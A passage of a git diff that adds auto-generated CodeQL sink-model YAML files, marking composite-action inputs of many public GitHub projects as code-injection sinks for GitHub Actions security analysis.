pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 000000000000..5cc3a3a74750 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 000000000000..cee842ae1c6f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 000000000000..535e832c1c32 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 000000000000..e1902fb488fd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 000000000000..2ede3df98649 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 000000000000..1bea0aef9358 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 000000000000..4a8bae9d2a1c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..c63ed017ae17 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 000000000000..544fc4b99516 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 000000000000..2d3871a2231e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 000000000000..4f18723df389 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 000000000000..a96d86c7b5ca --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 000000000000..ff1b101be4ac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..fb7bdd0950ee --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 000000000000..9b263d03357c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 000000000000..5e6e66c4be4e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 000000000000..cf545a955924 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 000000000000..0484e9035153 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 000000000000..756a1a0371ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 000000000000..ed954bf6f978 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 000000000000..47aebb458258 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 000000000000..28935d7a98bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 000000000000..2ba9ff355e21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 000000000000..530cc68ca4b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 000000000000..e75197656f56 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..b56944cd0ff7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 000000000000..e6d2a79b8477 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 000000000000..ffd74df05e2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 000000000000..f476d7160f62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 000000000000..e95dacb65a92 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 000000000000..42a9859aa230 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 000000000000..029e4f95a2a4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 000000000000..3223e185c7b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 000000000000..26fa1ce22b79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 000000000000..a68a3372089a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 000000000000..6c874d646558 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 000000000000..8d339364cf3d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 000000000000..db6751f8ef5b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 000000000000..68959bf21024 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 000000000000..f8aa8480088b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 000000000000..0f78fddcd969 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 000000000000..9eb860b13d91 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 000000000000..573b256121f9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 000000000000..c5278340c0b1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 000000000000..b11973cfa008 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 